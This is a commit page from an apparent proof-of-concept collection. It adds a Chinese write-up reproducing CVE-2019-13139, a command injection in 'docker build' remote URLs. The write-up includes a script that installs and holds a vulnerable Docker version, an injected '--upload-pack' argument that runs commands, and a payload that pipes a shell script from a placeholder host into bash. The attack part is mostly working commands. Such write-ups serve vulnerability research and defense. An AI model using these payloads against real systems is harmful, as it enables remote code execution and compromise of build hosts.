admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-05-06 02:31:35 +00:00
Code Issues Packages Projects Releases Wiki Activity

update CVE-2019-13139

Browse Source
This commit is contained in:
Threekiii 2025-04-21 17:36:11 +08:00
parent ad0e23d14b
commit 98dd292f01
4 changed files with 94 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

94
云安全漏洞/Docker build 漏洞导致命令执行 CVE-2019-13139.md Normal file
View File

@ -0,0 +1,94 @@
# Docker build 漏洞导致命令执行 CVE-2019-13139
## 漏洞描述
使用 `docker build` 命令构建本地镜像时,支持使用远程 url 参数作为构建环境,并且这个远程构建环境可以是一个 git 仓库。
在 Docker 18.9.4 之前版本中,`docker build` 过程中对 `remoteUrl` 解析存在缺陷,导致了 `remoteUrl` 中的部分字符串会被作为命令执行。
参考链接:
- https://nvd.nist.gov/vuln/detail/CVE-2019-13139
- https://staaldraad.github.io/post/2019-07-16-cve-2019-13139-docker-build/
- https://github.com/Metarget/metarget
## 漏洞影响
```
Docker < 18.9.4
```
## 环境搭建
ubuntu 18.04 使用以下脚本 `install_docker_18.09.03.sh` 安装 Docker 18.9.3
```
#!/bin/bash
set -e
echo "[*] Removing old Docker versions (if any)..."
sudo apt remove -y docker docker-engine docker.io containerd runc || true
echo "[*] Removing incorrect Docker sources..."
sudo rm -f /etc/apt/sources.list.d/docker.list || true
sudo sed -i '/download.docker.com/d' /etc/apt/sources.list
echo "[*] Adding Tsinghua University Docker mirror GPG key..."
wget -qO - https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu/gpg | sudo apt-key add -
echo "[*] Adding Tsinghua University Docker mirror repository..."
echo "deb [arch=amd64] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu bionic stable" \
| sudo tee /etc/apt/sources.list.d/docker.list
echo "[*] Updating package index..."
sudo apt update
echo "[*] Searching for Docker 18.09.3..."
VERSION_STRING=$(apt-cache madison docker-ce | grep 18.09.3 | head -n1 | awk '{print $3}')
if [ -z "$VERSION_STRING" ]; then
echo "[*] Docker 18.09.3 not found"
exit 1
fi
echo "[*] Found version: $VERSION_STRING"
echo "[*] Installing Docker version $VERSION_STRING ..."
sudo apt install -y docker-ce=$VERSION_STRING docker-ce-cli=$VERSION_STRING containerd.io
echo "[*] Locking version to prevent automatic updates..."
sudo apt-mark hold docker-ce docker-ce-cli containerd.io
echo "[*] Installation complete, current version:"
docker --version
```
![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421090739097.png)
## 漏洞复现
执行相关利用命令,执行结果报错但不影响:
```
docker build "git@g.com/a/b#--upload-pack=touch 13139.txt;:"
```
查看命令是否执行成功:
```
ls | grep 13139
------
13139.txt
```
![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421090836057.png)
下载远程 shell 文件并执行:
```
# port must be 80
docker build "git@github.com/a/b#--upload-pack=curl -s your-ip/shell.sh|bash;#:"
```
![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421092642068.png)
## 漏洞修复
- 升级至最新版本 https://docs.docker.com/engine/release-notes/

BIN
云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090739097.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 34 KiB

BIN
云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090836057.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 27 KiB

BIN
云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421092642068.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 81 KiB